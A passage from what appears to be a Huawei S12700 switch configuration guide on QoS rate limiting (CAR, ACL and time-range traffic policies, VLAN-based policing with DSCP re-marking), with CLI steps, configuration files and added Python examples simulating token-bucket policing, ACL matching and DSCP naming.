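        """Colour one packet of `size` bytes arriving at `now` seconds (RFC 2698,
        colour-blind): red exceeds PIR, yellow exceeds CIR only, green conforms."""
        elapsed = now - self._last
        self._last = now
        # 1 kbit/s = 125 bytes/s; both buckets refill continuously up to their size.
        self._tc = min(self.cbs, self._tc + 125 * self.cir_kbps * elapsed)
        self._tp = min(self.pbs, self._tp + 125 * self.pir_kbps * elapsed)
        if self._tp < size:          # not enough peak tokens: red, discarded
            return "red"
        self._tp -= size
        if self._tc < size:          # peak ok but not committed: yellow, passed
            return "yellow"
        self._tc -= size
        return "green"               # within CIR: green, passed


def simulate_car(cir_kbps: int, pir_kbps: int, rate_kbps: int,
                 seconds: float = 60.0, pkt_bytes: int = 1000) -> dict:
    """Offer a constant stream of pkt_bytes packets at rate_kbps for `seconds`
    and count how many packets of each colour the profile produces."""
    car = CarProfile(cir_kbps, pir_kbps)
    interval = pkt_bytes * 8 / (rate_kbps * 1000)      # seconds per packet
    counts = {"green": 0, "yellow": 0, "red": 0}
    for i in range(int(seconds / interval)):
        counts[car.mark(i * interval, pkt_bytes)] += 1
    return counts


def drop_ratio(counts: dict) -> float:
    """Fraction of offered packets that the profile discarded (red)."""
    total = sum(counts.values())
    return counts["red"] / total if total else 0.0


if __name__ == "__main__":
    # The two profiles of this example and the three test rates from Step 4.
    profiles = {"car1 (GE1/0/1)": (8192, 10240), "car2 (GE1/0/2)": (5120, 8192)}
    for name, (cir, pir) in profiles.items():
        for rate in (6000, 9000, 11000):
            c = simulate_car(cir, pir, rate)
            print(f"{name} offered {rate:5d} kbit/s: {c}  dropped {drop_ratio(c):.1%}")
```

Running the script shows no drops at 6000 kbit/s, drops only on car2 at 9000 kbit/s, and drops on both profiles at 11000 kbit/s, as the text describes; the drop ratio approaches (rate - PIR) / rate once the peak bucket has drained, which is why the first seconds of an overload pass unharmed.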

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 100 200
#
qos car car1 cir 8192 pir 10240 cbs 1024000 pbs 1280000
qos car car2 cir 5120 pir 8192 cbs 640000 pbs 1024000
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
qos car inbound car1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 200
qos car inbound car2
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 100 200
#
return

Relevant Information
Video

Configure Interface-based Rate Limiting

17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting

Overview
In a traffic policy, access control list (ACL) rules can be used to classify packets. ACLs fall
into basic, advanced, and Layer 2 ACLs; for example, a basic ACL defines rules based on the
source IP address, fragment flag, and time range. Traffic policing is then configured in the
traffic behavior to limit the rate of the matched packets.

An ACL consists of one or more rules. Each rule specifies the conditions, such as source
address, destination address, and port number, against which packets are matched.

Configuration Notes

Table 17-3 Applicable product models and versions

Product   Product Model       Software Version
S12700    S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704              V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.


Networking Requirements
As shown in Figure 17-3, the company has two departments, which belong to VLAN 10 and
VLAN 20 respectively. Servers that require high bandwidth are deployed in VLAN 10;
employees in VLAN 20 only need to access the Internet and do not require high bandwidth.
The company has purchased a 10 Mbit/s leased line from a carrier. It requires that the Internet
access bandwidth of employees in VLAN 20 stay in the range of 2 Mbit/s to 4 Mbit/s, and that
traffic exceeding 4 Mbit/s be discarded.

Figure 17-3 Configuring a traffic policy to implement rate limiting


(Figure not reproduced. It shows VLAN 10 192.168.1.0/24 and VLAN 20 192.168.2.0/24 attached to SwitchA, SwitchA GE1/0/3 connected to Switch GE1/0/1, Switch GE1/0/2 connected to Router GE0/0/1 at 10.1.20.1/24, and the Router connected to the Network.)

Device    Interface              VLAN                  Layer 3 Interface         IP Address
SwitchA   GigabitEthernet1/0/1   VLAN 10               -                         -
          GigabitEthernet1/0/2   VLAN 20               -                         -
          GigabitEthernet1/0/3   VLAN 10 and VLAN 20   -                         -
Switch    GigabitEthernet1/0/1   VLAN 10 and VLAN 20   VLANIF 10 and VLANIF 20   VLANIF 10: 192.168.1.1/24; VLANIF 20: 192.168.2.1/24
          GigabitEthernet1/0/2   VLAN 30               VLANIF 30                 10.1.20.2/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, and configure interfaces and a routing protocol to implement
interworking between the company and external network.
2. Configure an ACL on the Switch to match traffic from a specified network segment.
3. Configure a traffic classifier on the Switch to classify packets based on the ACL.
4. Configure a traffic behavior on the Switch to limit the rate of matched traffic.
5. Configure a traffic policy on the Switch, bind the traffic policy to the traffic classifier
and traffic behavior, and apply the traffic policy to GE1/0/1 connected to SwitchA in the
inbound direction to implement rate limiting.

Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol.

# Configure the switch.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 //Create VLAN 10, VLAN 20, and VLAN 30.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the interface to trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add the interface to VLAN 10 and VLAN 20.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access //Set the link type of the interface to access.
[Switch-GigabitEthernet1/0/2] port default vlan 30 //Add the interface to VLAN 30.
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 192.168.1.1 255.255.255.0 //Configure an IP address for the VLANIF interface. The IP address is the gateway address of network segment 192.168.1.0/24.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.1 255.255.255.0
[Switch-Vlanif20] quit
[Switch] interface vlanif 30 //Create a VLANIF interface.
[Switch-Vlanif30] ip address 10.1.20.2 255.255.255.0 //Configure an IP address for the VLANIF interface to connect to the router.
[Switch-Vlanif30] quit
[Switch] ip route-static 0.0.0.0 0 10.1.20.1 //Configure a static route pointing to the external network to implement interworking.

# Configure SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 //Create VLAN 10 and VLAN 20.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Set the link type of the interface to access.
[SwitchA-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN 10.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk //Set the link type of the interface to trunk.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20 //Add the interface to VLAN 10 and VLAN 20.
[SwitchA-GigabitEthernet1/0/3] quit

# Configure the router.

Configure the IP address of 10.1.20.1/24 for the interface of the router connected to the
switch.


Step 2 Configure an ACL.

# Configure an ACL on the Switch to match traffic from network segment 192.168.2.0/24.
[Switch] acl 3000
[Switch-acl-adv-3000] rule permit ip source 192.168.2.0 0.0.0.255
[Switch-acl-adv-3000] quit

Step 3 Configure a traffic classifier.

# Configure a traffic classifier on the Switch to classify packets based on the ACL.
[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match acl 3000
[Switch-classifier-c1] quit

Step 4 Configure a traffic behavior.

# Configure a traffic behavior on the Switch to limit the rate of matched traffic.
[Switch] traffic behavior b1
[Switch-behavior-b1] car cir 2048 pir 4096 //Set the CIR to 2 Mbit/s and PIR to 4 Mbit/s.
[Switch-behavior-b1] quit

Step 5 Configure a traffic policy and apply the traffic policy to an interface.

# Create a traffic policy on the Switch, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 connected to
SwitchA.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 6 Verify the configuration.

# Check the ACL configuration.


[Switch] display acl 3000
Advanced ACL 3000, 1 rule
Acl's step is 5
rule 5 permit ip source 192.168.2.0 0.0.0.255 (match-counter 0)

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Committed Access Rate:
CIR 2048 (Kbps), PIR 4096 (Kbps), CBS 256000 (byte), PBS 512000 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard

----End


Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30
#
acl number 3000
rule 5 permit ip source 192.168.2.0 0.0.0.255
#
traffic classifier c1 operator and precedence 5
if-match acl 3000
#
traffic behavior b1
permit
car cir 2048 pir 4096 cbs 256000 pbs 512000 mode color-blind green pass yellow pass red discard
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy p1 inbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 30
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return

Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 10 20
#
return

Relevant Information
Video


Configure IP Subnet-based Rate Limiting

17.4 Example for Configuring Rate Limiting in a Specified Time Range
Overview of the ACL Time Range
An ACL supports various matching conditions. You can configure a time range on the device
and reference it in ACL rules, so that the device matches packets only during that time range
and the administrator can apply different policies to packets at different times.
In this example, a basic ACL references a time range, and the basic ACL is in turn referenced
by a traffic policy, so that the device limits the Internet access rate of employees only in the
specified time range. This implements time-based user bandwidth limiting.

Configuration Notes

Table 17-4 Applicable product models and versions

Product   Product Model       Software Version
S12700    S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704              V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-4, enterprise users connect to external network devices through
GE2/0/1 of the switch.
During work hours from 8:30 to 18:00, the Internet access rate of employees needs to be
limited within 4 Mbit/s.


Figure 17-4 Networking for configuring rate limiting in a specified time range

(Figure not reproduced. Labels in the figure: HostA 192.168.1.10/24, HostB 192.168.1.11/24, HostC 192.168.1.12/24 on the enterprise campus network, LSW, Switch with GE1/0/1 and GE2/0/1, Router, Internet; traffic direction is toward the Internet.)

Configuration Roadmap
The traffic policy based on the time range is used to implement rate limiting. The
configuration roadmap is as follows:
1. Configure interfaces so that enterprise users can access the Internet through the Switch.
2. Configure a time range and reference the time range in an ACL.
3. Configure an ACL to match traffic passing the device in the specified time range.
4. Configure a traffic policy to limit the rate of packets matching ACL rules.
5. Apply the traffic policy to GE1/0/1 in the inbound direction.

Procedure
Step 1 Create a VLAN and configure interfaces.

# Create VLAN 10 on the Switch.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 10
[Switch-vlan10] quit

# Configure GE1/0/1 and GE2/0/1 on the Switch as trunk interfaces and add them to VLAN
10.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet2/0/1] quit

NOTE

Configure the interface of the LSW connected to the Switch as a trunk interface and add it to VLAN 10.

# Create VLANIF 10 and set its IP address to 192.168.1.1/24.

[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 192.168.1.1 24
[Switch-Vlanif10] quit

NOTE

On the router, set the IP address of the interface connected to the Switch to 192.168.1.2/24, and
configure a sub-interface on that interface to terminate the VLAN.

Step 2 Create a periodic time range working_time that defines work hours from 8:30 to 18:00.
[Switch] time-range working_time 08:30 to 18:00 working-day //Define the work hours.

Step 3 Configure ACL 2001 and define three rules to limit the bandwidth of packets from
192.168.1.10, 192.168.1.11, and 192.168.1.12 during work hours.
[Switch] acl number 2001
[Switch-acl-basic-2001] rule permit source 192.168.1.10 0 time-range working_time //Limit the rate of packets from 192.168.1.10 at work hours.
[Switch-acl-basic-2001] rule permit source 192.168.1.11 0 time-range working_time //Limit the rate of packets from 192.168.1.11 at work hours.
[Switch-acl-basic-2001] rule permit source 192.168.1.12 0 time-range working_time //Limit the rate of packets from 192.168.1.12 at work hours.
[Switch-acl-basic-2001] quit
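The ACL rules used in section 17.3 (rule permit ip source 192.168.2.0 0.0.0.255) and in Step 3 above (host rules qualified with time-range working_time) are evaluated by wildcard-mask matching plus a time-range check. The Python code below is an added example, not Huawei code: it implements first-match ACL evaluation with a wildcard mask (a 1 bit in the mask means "do not care", and the shorthand 0 means an exact host), treats a rule whose time range is inactive as not in effect, and maps working-day to Monday through Friday. Inclusive handling of the 08:30 and 18:00 boundaries is an assumption of this model, as is the datetime used in the examples (constructed for illustration).

```python
"""First-match ACL evaluation with wildcard masks and periodic time ranges (added example)."""
from dataclasses import dataclass
from datetime import datetime, time
from ipaddress import IPv4Address
from typing import Optional, Sequence

WORKING_DAY = frozenset(range(0, 5))   # Monday..Friday in datetime.weekday() numbering


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """Wildcard-mask match as used in ACL rules: 1 bits in the wildcard are
    ignored, 0 bits must be equal; '0' is shorthand for 0.0.0.0 (exact host)."""
    if wildcard == "0":
        wildcard = "0.0.0.0"
    care = ~int(IPv4Address(wildcard)) & 0xFFFFFFFF
    return int(IPv4Address(addr)) & care == int(IPv4Address(base)) & care


@dataclass(frozen=True)
class TimeRange:
    name: str
    start: time
    end: time
    weekdays: frozenset = WORKING_DAY   # 'working-day'

    def active(self, when: datetime) -> bool:
        # Inclusive start and end boundaries are an assumption of this model.
        return when.weekday() in self.weekdays and self.start <= when.time() <= self.end


@dataclass(frozen=True)
class Rule:
    action: str                         # "permit" or "deny"
    source: str                         # base source address
    wildcard: str                       # wildcard mask for the source
    time_range: Optional[TimeRange] = None

    def matches(self, src_ip: str, when: datetime) -> bool:
        # A rule whose referenced time range is inactive is not in effect at all.
        if self.time_range is not None and not self.time_range.active(when):
            return False
        return wildcard_match(src_ip, self.source, self.wildcard)


def evaluate_acl(rules: Sequence[Rule], src_ip: str, when: datetime) -> Optional[str]:
    """Return the action of the first matching rule, or None when no rule
    matches (a classifier using 'if-match acl' then does not match either)."""
    for rule in rules:
        if rule.matches(src_ip, when):
            return rule.action
    return None


# The ACLs of sections 17.3 and 17.4, expressed as data.
ACL_3000 = [Rule("permit", "192.168.2.0", "0.0.0.255")]
WORKING_TIME = TimeRange("working_time", time(8, 30), time(18, 0))
ACL_2001 = [Rule("permit", host, "0", WORKING_TIME)
            for host in ("192.168.1.10", "192.168.1.11", "192.168.1.12")]


def is_rate_limited(src_ip: str, when: datetime) -> bool:
    """Does classifier c1 (if-match acl 2001) match this packet, so that the
    car action of behavior b1 is applied to it?"""
    return evaluate_acl(ACL_2001, src_ip, when) == "permit"


if __name__ == "__main__":
    monday_morning = datetime(2016, 10, 31, 9, 0)     # constructed sample time
    monday_evening = datetime(2016, 10, 31, 19, 0)
    for when in (monday_morning, monday_evening):
        print(when, "192.168.1.11 rate limited:", is_rate_limited("192.168.1.11", when))
```

Outside working_time the three rules are not in effect, so the classifier does not match and the hosts are not policed; a host not listed in ACL 2001 is never policed by this policy, whatever the time.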

Step 4 Reference ACL 2001 in a traffic classifier to classify packets.


[Switch] traffic classifier c1
[Switch-classifier-c1] if-match acl 2001
[Switch-classifier-c1] quit

Step 5 Configure a traffic behavior to set the rate limit to 4 Mbit/s.


[Switch] traffic behavior b1
[Switch-behavior-b1] car cir 4096 //Limit the Internet access rate to 4 Mbit/s at work hours.
[Switch-behavior-b1] quit

Step 6 Configure a traffic policy and apply the traffic policy to GE1/0/1 in the inbound direction.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 7 Verify the configuration.


# Check the traffic classifier configuration.
[Switch] display traffic classifier user-defined c1
User Defined Classifier Information:
Classifier: c1
Precedence: 5
Operator: OR
Rule(s) : if-match acl 2001

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit
Committed Access Rate:
CIR 4096 (Kbps), PIR 4096 (Kbps), CBS 770048 (byte), PBS 1282048 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
time-range working_time 08:30 to 18:00 working-day
#
acl number 2001
rule 5 permit source 192.168.1.10 0 time-range working_time
rule 10 permit source 192.168.1.11 0 time-range working_time
rule 15 permit source 192.168.1.12 0 time-range working_time
#
traffic classifier c1 operator or precedence 5
if-match acl 2001
#
traffic behavior b1
permit
car cir 4096 pir 4096 cbs 770048 pbs 1282048 mode color-blind green pass yellow pass red discard
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
traffic-policy p1 inbound
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
return

17.5 Example for Configuring Rate Limiting Based on VLAN IDs

Overview of a Traffic Classifier


In addition to an ACL, a traffic classifier in MQC defines many Layer 2 and Layer 3
matching rules such as the VLAN ID, 802.1p priority, DSCP priority, source MAC address,
and destination MAC address. You can configure different traffic classifiers on the device to
identify packets and configure actions such as rate limiting, statistics, or mirroring for these
packets.

In this example, traffic classifiers are configured based on VLAN IDs and different CIR
values are configured so that the device allocates different bandwidth to service flows.


Configuration Notes

Table 17-5 Applicable product models and versions

Product   Product Model       Software Version
S12700    S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704              V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-5, the Switch connects to the router through GE2/0/1, and the
enterprise connects to the Internet through the Switch and router.
Voice, video, and data services are transmitted in VLAN 120, VLAN 110, and VLAN 100
respectively.
Traffic policing needs to be configured on the Switch to police packets of different services so
that traffic is limited within a proper range and bandwidth of each service is guaranteed.
Voice, video, and data services have QoS requirements in descending order of priority. The
Switch needs to re-mark DSCP priorities in different service packets so that the downstream
router processes them based on priorities, ensuring QoS of different services.
Table 17-6 describes the QoS requirements.

Table 17-6 QoS guarantee for uplink traffic on the Switch


Traffic Type   CIR (kbit/s)   PIR (kbit/s)   DSCP Priority
Voice          2000           10000          46
Video          4000           10000          30
Data           4000           10000          14

Figure 17-5 Networking of traffic policing

(Figure not reproduced. Labels in the figure: Phone in VLAN 120, PC in VLAN 100, TV in VLAN 110 on the enterprise campus network, LSW, Switch with GE1/0/1 and GE2/0/1, Router, Network; traffic direction is toward the Network.)

Configuration Roadmap
The configuration roadmap is as follows:
1. Create a VLAN and configure interfaces so that the enterprise can access the Internet
through the Switch.
2. Configure traffic classifiers on the Switch to classify packets based on VLAN IDs.
3. Configure traffic behaviors on the Switch to limit the rate of packets and re-mark DSCP
priorities of packets.
4. Configure a traffic policy on the Switch, bind traffic behaviors and traffic classifiers, and
apply the traffic policy to the interface on the Switch connected to the LSW.

Procedure
Step 1 Create VLANs and configure interfaces.
# Create VLAN 100, VLAN 110, and VLAN 120 on the Switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 100 110 120

# Configure GE1/0/1 and GE2/0/1 as trunk interfaces and add them to VLAN 100, VLAN
110, and VLAN 120.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 110 120
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 100 110 120
[Switch-GigabitEthernet2/0/1] quit

Step 2 Configure traffic classifiers.


# Configure traffic classifiers c1, c2, and c3 on the Switch to classify different service flows
from the enterprise based on VLAN IDs.
[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match vlan-id 120 //Configure a matching rule to match
packets with VLAN 120.
[Switch-classifier-c1] quit
[Switch] traffic classifier c2 operator and
[Switch-classifier-c2] if-match vlan-id 110 //Configure a matching rule to match
packets with VLAN 110.
[Switch-classifier-c2] quit
[Switch] traffic classifier c3 operator and
[Switch-classifier-c3] if-match vlan-id 100 //Configure a matching rule to match
packets with VLAN 100.
[Switch-classifier-c3] quit

Step 3 Configure traffic behaviors.


# Configure traffic behaviors b1, b2, and b3 on the Switch to police the service flows, re-mark
their priorities, and collect traffic statistics.
[Switch] traffic behavior b1
[Switch-behavior-b1] car cir 2000 pir 10000 green pass //Set the CIR of packets with VLAN 120 to 2000 kbit/s.
[Switch-behavior-b1] remark dscp 46 //Configure the device to re-mark DSCP priorities of packets from VLAN 120 with 46.
[Switch-behavior-b1] statistic enable //Enable traffic statistics.
[Switch-behavior-b1] quit
[Switch] traffic behavior b2
[Switch-behavior-b2] car cir 4000 pir 10000 green pass
[Switch-behavior-b2] remark dscp 30
[Switch-behavior-b2] statistic enable
[Switch-behavior-b2] quit
[Switch] traffic behavior b3
[Switch-behavior-b3] car cir 4000 pir 10000 green pass
[Switch-behavior-b3] remark dscp 14
[Switch-behavior-b3] statistic enable
[Switch-behavior-b3] quit

Step 4 Configure a traffic policy and apply the traffic policy to an interface.
# Create a traffic policy p1 on the Switch, bind the traffic classifiers and traffic behaviors to
the traffic policy, and apply the traffic policy to GE1/0/1 in the inbound direction to police
packets from the enterprise and re-mark the packet priorities.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] classifier c2 behavior b2
[Switch-trafficpolicy-p1] classifier c3 behavior b3
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 5 Verify the configuration.


# Check the traffic classifier configuration.
[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: c2
Precedence: 10
Operator: AND
Rule(s) : if-match vlan-id 110

Classifier: c3
Precedence: 15
Operator: AND
Rule(s) : if-match vlan-id 100

Classifier: c1
Precedence: 5
Operator: AND
Rule(s) : if-match vlan-id 120

Total classifier number is 3

# Check the configuration of the traffic policy p1.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c2
Operator: AND
Behavior: b2
Permit
Committed Access Rate:
CIR 4000 (Kbps), PIR 10000 (Kbps), CBS 500000 (byte), PBS 1250000 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard
Remark:
Remark DSCP af33
Statistic: enable
Classifier: c3
Operator: AND
Behavior: b3
Permit
Committed Access Rate:
CIR 4000 (Kbps), PIR 10000 (Kbps), CBS 500000 (byte), PBS 1250000 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard
Remark:
Remark DSCP af13
Statistic: enable
Classifier: c1
Operator: AND
Behavior: b1
Permit
Committed Access Rate:
CIR 2000 (Kbps), PIR 10000 (Kbps), CBS 250000 (byte), PBS 1250000 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard
Remark:
Remark DSCP ef
Statistic: enable
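The display output prints the values configured as remark dscp 46, 30, and 14 as ef, af33, and af13. These names follow the standard DSCP encoding: the top three bits select the class (cs0 to cs7), the assured forwarding codepoints encode class 1 to 4 and drop precedence 1 to 3 as 8 × class + 2 × drop, and 46 is expedited forwarding. The Python functions below are an added example, not Huawei code; they convert between the numeric DSCP values in Table 17-6 and the PHB names the display command prints. The name cs0 for DSCP 0 is the RFC 2474 name and is not taken from this page.

```python
"""DSCP value <-> PHB name conversion, explaining the 'Remark DSCP af33' output (added example)."""


def dscp_to_phb(dscp: int) -> str:
    """Name a DSCP value the way the display output does: ef, afXY, csN;
    values without a standard name are returned as the decimal number."""
    if not 0 <= dscp <= 63:
        raise ValueError(f"DSCP out of range: {dscp}")
    if dscp == 46:
        return "ef"                      # expedited forwarding (RFC 3246)
    cls, low = divmod(dscp, 8)           # class selector = top 3 bits
    if low == 0:
        return f"cs{cls}"                # cs0 is the default (best effort) PHB
    drop = low // 2
    if 1 <= cls <= 4 and low % 2 == 0 and 1 <= drop <= 3:
        return f"af{cls}{drop}"          # assured forwarding (RFC 2597)
    return str(dscp)


def phb_to_dscp(name: str) -> int:
    """Inverse of dscp_to_phb; also accepts a plain decimal value."""
    name = name.lower()
    if name == "ef":
        return 46
    if name.startswith("cs") and name[2:].isdigit() and 0 <= int(name[2:]) <= 7:
        return 8 * int(name[2:])
    if len(name) == 4 and name.startswith("af") and name[2:].isdigit():
        cls, drop = int(name[2]), int(name[3])
        if 1 <= cls <= 4 and 1 <= drop <= 3:
            return 8 * cls + 2 * drop
    if name.isdigit() and 0 <= int(name) <= 63:
        return int(name)
    raise ValueError(f"unknown DSCP name: {name}")


# Table 17-6 of this example: the numeric values given in the behaviors.
TABLE_17_6 = {"Voice": 46, "Video": 30, "Data": 14}


def remark_names() -> dict:
    """The names the 'display traffic policy user-defined' output shows for Table 17-6."""
    return {service: dscp_to_phb(dscp) for service, dscp in TABLE_17_6.items()}


if __name__ == "__main__":
    for service, name in remark_names().items():
        print(f"{service}: remark dscp {TABLE_17_6[service]} is displayed as {name}")
```

The round trip phb_to_dscp(dscp_to_phb(d)) == d holds for every value 0 to 63, so the display name can be compared safely against the number in the behavior.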

# Check information about the traffic policy that is applied to the interface. GE1/0/1 is used as
an example.
[Switch] display traffic policy statistics interface gigabitethernet 1/0/1 inbound

Interface: GigabitEthernet1/0/1
Traffic policy inbound: p1
Rule number: 3
Current status: success
Statistics interval: 300
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
Matched | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Dropped | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: -
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: -
---------------------------------------------------------------------

----End

Configuration Files
Configuration file of the Switch

#
sysname Switch
#
vlan batch 100 110 120
#
traffic classifier c1 operator and precedence 5
if-match vlan-id 120
traffic classifier c2 operator and precedence 10
if-match vlan-id 110
traffic classifier c3 operator and precedence 15
if-match vlan-id 100
#
traffic behavior b1
permit
car cir 2000 pir 10000 cbs 250000 pbs 1250000 mode color-blind green pass yellow pass red discard
remark dscp ef
statistic enable
traffic behavior b2
permit
car cir 4000 pir 10000 cbs 500000 pbs 1250000 mode color-blind green pass yellow pass red discard
remark dscp af33
statistic enable
traffic behavior b3
permit
car cir 4000 pir 10000 cbs 500000 pbs 1250000 mode color-blind green pass yellow pass red discard
remark dscp af13
statistic enable
#
traffic policy p1 match-order config
classifier c1 behavior b1
classifier c2 behavior b2
classifier c3 behavior b3
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 110 120
traffic-policy p1 inbound
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 100 110 120
#
return

Relevant Information
Video
Configure VLAN-based Rate Limiting

17.6 Example for Configuring Traffic Shaping

Overview of Traffic Shaping


Traffic shaping adjusts the rate of outgoing traffic to ensure an even transmission rate. Traffic
shaping uses the buffer and token bucket to control traffic. When packets are sent at high
speed, traffic shaping caches packets in the buffer and then evenly sends these cached packets
based on the token bucket.
Traffic shaping is often configured on the downstream device to prevent packet loss caused by
congestion. For example, the headquarters connects to its branch through a leased line that has
finite bandwidth. Traffic policing is configured on the headquarters edge device to limit the
packet sending rate. In this situation, traffic shaping can be configured on the branch edge
device to cache excess packets, preventing packet loss.

Configuration Notes

Table 17-7 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-6, the Switch is connected to the router through GE2/0/1. The 802.1p
priorities of voice, video, and data services are 6, 5, and 2, and these services can reach
residential users through the router and Switch. The transmission rate of traffic from the
enterprise campus network is higher than the transmission rate of traffic from the router;
